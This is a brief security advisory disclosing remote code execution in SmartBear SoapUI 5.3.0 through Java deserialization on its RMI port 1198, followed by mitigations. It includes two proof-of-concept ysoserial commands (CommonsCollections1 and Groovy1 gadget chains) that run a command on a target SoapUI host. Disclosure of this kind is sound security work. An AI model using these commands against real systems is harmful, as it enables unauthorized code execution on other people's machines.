SmartBear SoapUI 5.3.0 Remote Code Execution Via Deserialization
Posted on 07 October 2017
Title: SmartBear SoapUI - Remote Code Execution via Deserialization Author: Jakub Palaczynski Date: 12. July 2017 Exploit tested on: ================== SoapUI 5.3.0 Also works on older versions. Vulnerability: ************** Remote Code Execution via Deserialization: ================================= SoapUI by default listens on all interfaces on TCP port 1198 where you can find SoapUI Integration (RMI) instance. SoapUI uses vulnerable Java libraries (commons-collections-3.2.1.jar and groovy-all-2.1.7.jar) which can be used to remotly execute commands with permissions of user that started SoapUI. Entry point: Java RMI Registry on TCP port 1198 Vulnerable libraries used - commons-collections-3.2.1.jar and groovy-all-2.1.7.jar Proof of Concept: Sample PoC using Commons Collections vulnerable library: java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 CommonsCollections1 'ping OUR_IP' Sample PoC using Groovy vulnerable library: java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 Groovy1 'ping OUR_IP' Mitigations: - bind SoapUI Integration instance to localhost if possible - update all Java libraries that are known to be vulnerable: commons-collections-3.2.1.jar groovy-all-2.1.7.jar Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com